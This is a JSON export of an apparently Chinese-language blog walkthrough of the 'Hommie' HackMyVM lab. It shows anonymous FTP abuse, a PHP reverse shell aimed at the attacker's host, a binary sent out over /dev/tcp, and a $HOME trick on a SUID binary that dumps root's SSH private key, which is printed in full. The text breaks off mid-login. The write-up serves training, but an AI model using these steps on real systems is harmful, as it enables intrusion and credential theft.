{"id":542,"date":"2024-04-13T14:20:09","date_gmt":"2024-04-13T06:20:09","guid":{"rendered":"http:\/\/162.14.82.114\/?p=542"},"modified":"2024-04-13T14:20:09","modified_gmt":"2024-04-13T06:20:09","slug":"hmv-_-hommie","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/542\/04\/13\/2024\/","title":{"rendered":"hmv[-_-]Hommie"},"content":{"rendered":"<h1>Hommie<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419690.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419690.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413132820387\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419692.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419692.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413132929475\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 172.20.10.5 -- -A<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE REASON  VERSION\n21\/tcp open  ftp     syn-ack vsftpd 3.0.3\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:172.20.10.8\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 3\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 c6:27:ab:53:ab:b9:c0:20:37:36:52:a9:60:d3:53:fc (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDB7u7KKhG7At4Hcc+14cLowxLnO8KM0ktmdNGlQ3NQTg5ccopYqycES73Ie8F8x8LuGmUf63rAlZb58bR8mU0mv5gK6+DvTfsxu8Qv4RlK8ydOyEVhIFk2mukt99lNMmWiQdJ4WHlcSkHFJ0V0YsUiMIQpI+OJQ7yFFIGvmP9wbfxrDcZHPZVt86NgTQ0vwQB\/1phH0+DxMNjsaE25qwJ9MDdEs7XxMj31YsTWwm3nLxBbl7SFmRsUsSchrNDTQ355c0kco7\/H5cGqI9xm3x9VNCaQmNYapKezhAaEWqvIfP59SCaa8n6NpuP2kPuGJnqdqYo+sM5l\/SoCWEJL5HlL\n|   256 48:3b:28:1f:9a:23:da:71:f6:05:0b:a5:a6:c8:b7:b0 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFedEUVwZ\/C0itzERPAKuSiTugyl9+eZm4f9TQOujQAwyWHvyyiarpJCCqyaQg2DdQEPVMtO7cA3SpkISgseJlA=\n|   256 b3:2e:7c:ff:62:2d:53:dd:63:97:d4:47:72:c8:4e:30 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIO5HkrVfk6hVBmA2oAFN8nYRmsoXH+1hUZIuyF0DN\/YA\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419693.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419693.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413133207143\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u626b\u4e0d\u5230\u5c31\u4e0d\u626b\u4e86.<\/p>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>ftp\u767b\u5f55<\/h3>\n<p>\u5c1d\u8bd5\u533f\u540d\u767b\u5f55\u4e00\u4e0b\uff1a<code>anonymous<\/code>\u3001<code>ftp<\/code><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ftp 172.20.10.5                                                                                                      \nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; pwd\nRemote directory: \/\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||7447|)\n150 Here comes the directory listing.\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .web\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; ls -F\n229 Entering Extended Passive Mode (|||28677|)\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; cd .web\n250 Directory successfully changed.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||31351|)\n150 Here comes the directory listing.\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\n-rw-r--r--    1 0        0              99 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; get index.html\nlocal: index.html remote: index.html\n229 Entering Extended Passive Mode (|||45350|)\n150 Opening BINARY mode data connection for index.html (99 bytes).\n100% |***********************************************************************************************************|    99        1.45 MiB\/s    00:00 ETA\n226 Transfer complete.\n99 bytes received in 00:00 (147.15 KiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ cat index.html  \nalexia, Your id_rsa is exposed, please move it!!!!!\nIm fighting regarding reverse shells!\n-nobody<\/code><\/pre>\n<p>\u53ea\u6709<code>ftp<\/code>\u53ef\u4ee5\uff0c\u4e14\u5f97\u5230\u4e24\u4e2a\u7528\u6237<code>alexia<\/code>\u548c<code>nobody<\/code><\/p>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419694.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404131419694.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240413133757655\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u672a\u53d1\u73b0\u5b58\u5728dns\u89e3\u6790\u76f8\u5173\u573a\u666f\u3002<\/p>\n<h3>\u4e0a\u4f20reverseshell<\/h3>\n<pre><code class=\"language-bash\">\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ head revershell.php \n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;172.20.10.8&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ftp 172.20.10.5    \nConnected to 172.20.10.5.\n220 (vsFTPd 3.0.3)\nName (172.20.10.5:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||16177|)\n150 Here comes the directory listing.\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 .\ndrwxr-xr-x    3 0        113          4096 Sep 30  2020 ..\ndrwxrwxr-x    2 0        113          4096 Sep 30  2020 .web\n-rw-r--r--    1 0        0               0 Sep 30  2020 index.html\n226 Directory send OK.\nftp&gt; cd .web\n250 Directory successfully changed.\nftp&gt; put revershell.php \nlocal: revershell.php remote: revershell.php\n229 Entering Extended Passive Mode (|||62858|)\n150 Ok to send data.\n100% |***********************************************************************************************************|  3909       93.19 MiB\/s    00:00 ETA\n226 Transfer complete.\n3909 bytes sent in 00:00 (4.25 MiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ sudo pwncat-cs -lp 1234 2&gt;\/dev\/null\n[01:39:45] Welcome to pwncat \ud83d\udc08!<\/code><\/pre>\n<p>\u80fd\u770b\u5230\u6709\u6587\u4ef6\uff0c\u4f46\u662f\u4e0d\u4f1a\u89e3\u6790\u6587\u4ef6\u3002\u3002\u3002\u3002<\/p>\n<h3>\u91cd\u65b0\u626b\u63cf<\/h3>\n<p>\u65e0\u6cd5\u626b\u63cf\u76ee\u5f55\uff0c\u80af\u5b9a\u662f\u7aef\u53e3\u51fa\u95ee\u9898\u4e86\uff0c\u91cd\u65b0\u626b\u63cf\uff0c\u770b\u4e00\u4e0bUDP\u3002\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues7]\n\u2514\u2500$ sudo nmap 172.20.10.5 -sU -p 1-100 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-13 02:17 EDT\nStats: 0:01:38 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan\nUDP Scan Timing: About 99.99% done; ETC: 02:18 (0:00:00 remaining)\nNmap scan report for 172.20.10.5\nHost is up (0.00039s latency).\nNot shown: 98 closed udp ports (port-unreach)\nPORT   STATE         SERVICE\n68\/udp open|filtered dhcpc\n69\/udp open|filtered tftp\nMAC Address: 08:00:27:84:22:C1 (Oracle VirtualBox virtual NIC)\n\nNmap done: 1 IP address (1 host up) scanned in 112.27 seconds<\/code><\/pre>\n<h3>TFTP\u8fde\u63a5<\/h3>\n<p>\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ tftp 172.20.10.5    \ntftp&gt; help\ntftp-hpa 5.2\nCommands may be abbreviated.  Commands are:\n\nconnect         connect to remote tftp\nmode            set file transfer mode\nput             send file\nget             receive file\nquit            exit tftp\nverbose         toggle verbose mode\ntrace           toggle packet tracing\nliteral         toggle literal mode, ignore &#039;:&#039; in file name\nstatus          show current status\nbinary          set mode to octet\nascii           set mode to netascii\nrexmt           set per-packet transmission timeout\ntimeout         set total retransmission timeout\n?               print help information\nhelp            print help information\ntftp&gt; ls\n?Invalid command\ntftp&gt; get *\n^C\ntftp&gt; get id_rsa\ntftp&gt; exit\n?Invalid command\ntftp&gt; quit\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ls\n&#039;*&#039;   id_rsa   index.html   revershell.php<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4f7f\u7528\u8be5\u51ed\u8bc1\u5b9e\u73b0\u767b\u5f55\uff01<\/p>\n<h3>ssh\u8fde\u63a5<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ chmod 600 id_rsa                                            \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ssh hommie@172.20.10.5 -i id_rsa                            \nThe authenticity of host &#039;172.20.10.5 (172.20.10.5)&#039; can&#039;t be established.\nED25519 key fingerprint is SHA256:v3AMNdrxbep3tZ0By0ik1\/V+ZHj5ZuiffVZSnafj2YA.\nThis key is not known by any other names.\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes     \nWarning: Permanently added &#039;172.20.10.5&#039; (ED25519) to the list of known hosts.\nhommie@172.20.10.5: Permission denied (publickey).\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ ssh alexia@172.20.10.5 -i id_rsa                            \nLinux hommie 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64\n\nThe programs included with the Debian GNU\/Linux system are free software;\nthe exact distribution terms for each program are described in the\nindividual files in \/usr\/share\/doc\/*\/copyright.\n\nDebian GNU\/Linux comes with ABSOLUTELY NO WARRANTY, to the extent\npermitted by applicable law.\nLast login: Wed Sep 30 11:06:15 2020\nalexia@hommie:~$ whoami;id\nalexia\nuid=1000(alexia) gid=1000(alexia) groups=1000(alexia),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)<\/code><\/pre>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">alexia@hommie:~$ sudo -l\n-bash: sudo: command not found\nalexia@hommie:~$ pwd\n\/home\/alexia\nalexia@hommie:~$ ls -la\ntotal 36\ndrwxr-xr-x 4 alexia alexia 4096 Sep 30  2020 .\ndrwxr-xr-x 3 root   root   4096 Sep 30  2020 ..\n-rw-r--r-- 1 alexia alexia  220 Sep 30  2020 .bash_logout\n-rw-r--r-- 1 alexia alexia 3526 Sep 30  2020 .bashrc\ndrwxr-xr-x 3 alexia alexia 4096 Sep 30  2020 .local\n-rw-r--r-- 1 alexia alexia  807 Sep 30  2020 .profile\ndrwx------ 2 alexia alexia 4096 Sep 30  2020 .ssh\n-rw-r--r-- 1 alexia alexia   10 Sep 30  2020 user.txt\n-rw------- 1 alexia alexia   52 Sep 30  2020 .Xauthority\nalexia@hommie:~$ cat user.txt \nImnotroot\nalexia@hommie:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/opt\/showMetheKey\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/mount\n\/usr\/bin\/chsh\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\nalexia@hommie:~$ file \/opt\/showMetheKey\n\/opt\/showMetheKey: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped\nalexia@hommie:~$ cd \/opt<\/code><\/pre>\n<h3>\u5206\u6790\u7a0b\u5e8f<\/h3>\n<p>\u4f20\u8fc7\u6765\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">alexia@hommie:\/opt$ cat showMetheKey &gt; \/dev\/tcp\/172.20.10.8\/8888<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ nc -lp 8888 &gt; showMetheKey<\/code><\/pre>\n<p>\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u8f6f\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ file showMetheKey                                                                                                    \nshowMetheKey: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=63398a6916b1b6bf3991e2b05fa60bec15b1faff, not stripped\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/hommie]\n\u2514\u2500$ strings showMetheKey   \n\/lib64\/ld-linux-x86-64.so.2\nlibc.so.6\nsetuid\nsystem\n__cxa_finalize\nsetgid\n__libc_start_main\nGLIBC_2.2.5\n_ITM_deregisterTMCloneTable\n__gmon_start__\n_ITM_registerTMCloneTable\nu\/UH\n[]A\\A]A^A_\ncat $HOME\/.ssh\/id_rsa\n;*3$&quot;\nGCC: (Debian 8.3.0-6) 8.3.0\ncrtstuff.c\nderegister_tm_clones\n__do_global_dtors_aux\ncompleted.7325\n__do_global_dtors_aux_fini_array_entry\nframe_dummy\n__frame_dummy_init_array_entry\nshowMetheKey.c\n__FRAME_END__\n__init_array_end\n_DYNAMIC\n__init_array_start\n__GNU_EH_FRAME_HDR\n_GLOBAL_OFFSET_TABLE_\n__libc_csu_fini\n_ITM_deregisterTMCloneTable\n_edata\nsystem@@GLIBC_2.2.5\n__libc_start_main@@GLIBC_2.2.5\n__data_start\n__gmon_start__\n__dso_handle\n_IO_stdin_used\n__libc_csu_init\n__bss_start\nmain\nsetgid@@GLIBC_2.2.5\n__TMC_END__\n_ITM_registerTMCloneTable\nsetuid@@GLIBC_2.2.5\n__cxa_finalize@@GLIBC_2.2.5\n.symtab\n.strtab\n.shstrtab\n.interp\n.note.ABI-tag\n.note.gnu.build-id\n.gnu.hash\n.dynsym\n.dynstr\n.gnu.version\n.gnu.version_r\n.rela.dyn\n.rela.plt\n.init\n.plt.got\n.text\n.fini\n.rodata\n.eh_frame_hdr\n.eh_frame\n.init_array\n.fini_array\n.dynamic\n.got.plt\n.data\n.bss\n.comment<\/code><\/pre>\n<p>ida\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setuid(0);\n  setgid(0);\n  system(&quot;cat $HOME\/.ssh\/id_rsa&quot;);\n  return 0;\n}<\/code><\/pre>\n<h3>\u4fee\u6539$HOME\u8bfb\u53d6id_rsa<\/h3>\n<p>\u8fd9\u6837\u5c31\u7b80\u5355\u4e86\uff0c\u5b83\u8bfb\u53d6\u4e86\u73af\u5883\u53d8\u91cf\u7684<code>$HOME<\/code>\u7136\u540e\u8bfb\u53d6\u4e86\u8fde\u63a5\u79c1\u94a5\uff0c\u6211\u4eec\u4fee\u6539\u4e00\u4e0b\uff0c\u8ba9\u5176\u8bfb\u53d6<code>root<\/code>\u7684\u79c1\u94a5\u5373\u53ef\uff1a<\/p>\n<pre><code class=\"language-bash\">alexia@hommie:\/opt$ .\/showMetheKey \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEApwUR2Pvdhsu1RGG0UIWmj2yDNvs+4VLPG0WWisip6oZrjMjJ40h7\nV0zdgZSRFhMxx0\/E6ilh2MiMbpAuogCqC3MEodzIzHYAJyK4z\/lIqUNdHJbgLDyaY26G0y\nRn1XI+RqLi5NUHBPyiWEuQUEZCMOqi5lS1kaiNHmVqx+rlEs6ZUq7Z6lzYs7da3XcFGuOT\ngCnBh1Wb4m4e14yF+Syn4wQVh1u\/53XGmeB\/ClcdAbSKoJswjI1JqCCkxudwRMUYjq309j\nQMxa7bbxaJbkb3hLmMuFU7RGEPu7spLvzRwGAzCuU3f60qJVTp65pzFf3x51j3YAMI+ZBq\nkyNE1y12swAAA8i6ZpNpumaTaQAAAAdzc2gtcnNhAAABAQCnBRHY+92Gy7VEYbRQhaaPbI\nM2+z7hUs8bRZaKyKnqhmuMyMnjSHtXTN2BlJEWEzHHT8TqKWHYyIxukC6iAKoLcwSh3MjM\ndgAnIrjP+UipQ10cluAsPJpjbobTJGfVcj5GouLk1QcE\/KJYS5BQRkIw6qLmVLWRqI0eZW\nrH6uUSzplSrtnqXNizt1rddwUa45OAKcGHVZvibh7XjIX5LKfjBBWHW7\/ndcaZ4H8KVx0B\ntIqgmzCMjUmoIKTG53BExRiOrfT2NAzFrttvFoluRveEuYy4VTtEYQ+7uyku\/NHAYDMK5T\nd\/rSolVOnrmnMV\/fHnWPdgAwj5kGqTI0TXLXazAAAAAwEAAQAAAQBhD7sthEFbAqtXEAi\/\n+suu8frXSu9h9sPRL4GrKa5FUtTRviZFZWv4cf0QPwyJ7aGyGJNxGZd5aiLiZfwTvZsUiE\nUa47n1yGWSWMVaZ55ob3N\/F9czHg0C18qWjcOh8YBrgGGnZn1r0n1uHovBevMghlsgy\/2w\npmlMTtfdUo7JfEKbZmsz3auih2\/64rmVp3r0YyGrvOpWuV7spnzPNAFUCjPTwgE2RpBVtk\nWeiQtF8IedoMqitUsJU9ephyYqvjRemEugkqkALBJt91yBBO6ilulD8Xv1RBsVHUttE\/Jz\nbu4XlJXVeD10ooFofrsZd\/9Ydz4fx49GwtjYnqsda0rBAAAAgGbx1tdwaTPYdEfuK1kBhu\n3ln3QHVx3ZkZ7tNQFxxEjYjIPUQcFFoNBQpIUNOhLCphB8agrhcke5+aq5z2nMdXUJ3DO6\n0boB4mWSMml6aGpW4AfcDFTybT6V8pwZcThS9FL3K2JmlZbgPlhkX5fyOmh14\/i5ti7r9z\nHlBkwMfJJPAAAAgQDPt0ouxdkG1kDNhGbGuHSMAsPibivXEB7\/wK7XHTwtQZ7cCQTVqbbs\ny6FqG0oSaSz4m2DfWSRZc30351lU4ZEoHJmlL8Ul6yvCjMOnzUzkhrIen131h\/MStsQYtY\nOZgwwdcG2+N7MReMpbDA9FSHLtHoMLUcxShLSX3ccIoWxqAwAAAIEAzdgK1iwvZkOOtM08\nQPaLXRINjIKwVdmOk3Q7vFhFRoman0JeyUbEd0qlcXjFzo02MBlBadh+XlsDUqZSWo7gpp\nivFRbnEu2sy02CHilIJ6vXCQnuaflapCNG8MlG5CtpqfyVoYQ3N3d0PfOWLaB13fGeV\/wN\n0x2HyroKtB+OeZEAAAANYWxleGlhQGhvbW1pZQECAwQFBg==\n-----END OPENSSH PRIVATE KEY-----\nalexia@hommie:\/opt$ echo $HOME\n\/home\/alexia\nalexia@hommie:\/opt$ HOME = \/root\n-bash: HOME: command not found\nalexia@hommie:\/opt$ HOME=\/root\nalexia@hommie:\/opt$ echo $HOME\n\/root\nalexia@hommie:\/opt$ .\/showMetheKey \n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAvBYog1I3rTTmtMw6i7oPRYy7yj8N6zNT3K9QhalnaTF+Md5NjbX5\nhhNfZjO0tNbMGEeJtNTc3FpYWcAujrrd3jO5MzHUWAxQoyYYrZOFj2I5Fz\/0RxD7e89H11\n5nT7+CSUeddP\/UeoyvSPgaruwrwD+dUl7+GiXo3sc5vsq3YufTYh1MlMKb\/m7KmVk5n4Tk\n\/IFJwuuc3U4OZiRwXOmK4W2Gfo0Fonu6vFYmhpcCsi7V8g3hpVmOZIU8ZUtG1YbutCVbOC\nEGyc1p5nbnyC0IIF5Y2EhjeevX8gmj4Kdv\/y6yuvNdsJKm+ed2EEY9AymmPPwIpQshFwKz\nY0yB8N1jkQAAA8BiCyR9YgskfQAAAAdzc2gtcnNhAAABAQC8FiiDUjetNOa0zDqLug9FjL\nvKPw3rM1Pcr1CFqWdpMX4x3k2NtfmGE19mM7S01swYR4m01NzcWlhZwC6Out3eM7kzMdRY\nDFCjJhitk4WPYjkXP\/RHEPt7z0fXXmdPv4JJR510\/9R6jK9I+Bqu7CvAP51SXv4aJejexz\nm+yrdi59NiHUyUwpv+bsqZWTmfhOT8gUnC65zdTg5mJHBc6YrhbYZ+jQWie7q8ViaGlwKy\nLtXyDeGlWY5khTxlS0bVhu60JVs4IQbJzWnmdufILQggXljYSGN569fyCaPgp2\/\/LrK681\n2wkqb553YQRj0DKaY8\/AilCyEXArNjTIHw3WORAAAAAwEAAQAAAQA\/OvPDshAlmnM0tLO5\n5YLczsMS6r+zIj4\/InDffmPVaV4TRbisu1B3Umvv39IQOWXDg8k3kZfuPDEXexQrx4Zu\/N\nR18XqBXyJ8toH1WHK+ETdAKa\/ldEAXD0gHjyUMGkWifQDiJF86E7GZxk6yH5NVvg0Vc\/nY\nsIXo3vD6wwuDo\/gj+u4RRYMH3NYkLSj\/O67cxGXnTOZPGzGsFTrE218BNtNqbRBR9\/immU\nirjugqebxY135Z4oECe\/Hv4mP2e7n5QVO8FnYklQ4YU6y0ZTAMtjZCAhslXSKvaJPLjXuk\n\/HpdYhSoojm3vTAq\/NT\/oir0wA2ZYGdnF\/Bxm6v\/mntBAAAAgF2pqZEe9UqzcsAfOujr6z\nDMRgPpl8qsdhDz6aftdg24AYmgXJ1D7PWUDpU6puO3VxJGrOwvcgD6xELRTxeFjd\/2ssrh\n4OO\/kTvK4K0WVB\/bnZ4y724iLcThfHDbzTTc5ckn45tyso8540iKha5ay1i24GwRPWddie\nB\/qcB1bHNOAAAAgQDmmptuwTRwUSiU1NtZRnJFvxvzLw6Wy\/Cb2G+n5KY0ce5cYHT2HSIr\nzsbPaDXQNBFy4iu1DAXAJJXTrxjOaAeLVYSb\/8eZ1dhcgkxoAC8i2l6NwNmsjhGQKv++fV\nqMfIdzVmriLXBZf7DU97YZeDIOrdOOV5CHhq+37i4xNdK18wAAAIEA0Mzc8HYvrXk4ecyi\nKXP5u2Zxw2LADJ8DFeKWZmCUuNKFD1TuqdauxKxIVKVDaHvcnEr1bOiEBBso\/X1CCtKjE+\n12ZOWvqZ4fORxiNs9n\/9YxlUSDAw7kyKd9H7dRRFdtb80OgDiwf18tDlEdboGWm\/DR0NPq\ngmxzbd40GES6DWsAAAALcm9vdEBob21taWU=\n-----END OPENSSH PRIVATE KEY-----\nalexia@hommie:\/opt$ .\/showMetheKey &gt; \/tmp\/id_rsa\nalexia@hommie:\/opt$ cd \/tmp\nalexia@hommie:\/tmp$ chmod 600 id_rsa \nalexia@hommie:\/tmp$ ssh root@172.20.10.5 -i id_rsa \nThe authenticity of host &#039;172.20.10.5 (172.20.10.5)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:DJRhY4460szersb1lOMrzcqIuOctjcM95lIbf2pvnNk.\nAre you sure you want to continue connecting (yes\/no)? yes\nWarning: 